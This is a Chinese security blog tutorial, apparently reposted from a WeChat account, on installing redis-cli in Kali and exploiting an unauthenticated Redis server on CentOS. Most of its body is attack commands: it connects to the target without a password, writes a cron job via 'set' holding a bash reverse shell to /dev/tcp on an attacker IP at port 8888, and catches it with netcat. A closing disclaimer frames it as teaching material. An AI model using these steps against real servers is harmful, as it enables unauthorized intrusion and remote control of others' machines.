书接上篇,我们这里需要在kali中安装redis,这样我们才可以通过对方的未授权漏洞,进行一个远程的链接。
“ 新手走好每一步,就是前进的方向,追逐自己的梦吧。”
这里我们需要在kali中搭建,然后我们需要用kali中的redis来远程链接目标的redis
wget http://download.redis.io/redis-stable.tar.gz
这里步骤差不多,下载之后解压
tar -zxvf 文件名然后我们到目录下进行make命令执行
然后根据提示我们安装test库
make test
cp src/redis-cli /usr/bin
所以我们这里可以使用命令链接上没有密码的centos上的redis,
redis-cli -h 目标IP然后我们连接上对方的redis之后我们可以设置计划任务反弹shell
ubuntu不可以,centos可以。
先访问服务器。然后我们设置计划任务
set haha "nn* * * * * bash -i >& /dev/tcp/192.168.119.135/8888 0>&nn"
我们在黑客机器就可以打开nc接收反弹。
nc -lvp 8888
科学上网点这里
工具集合点这里
实战文章点这里
QQ查I P点这里
扫描二维码关注我们吧!
原文始发于微信公众号(白安全组):redis学习(二)redis在kali中安装并写入shell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论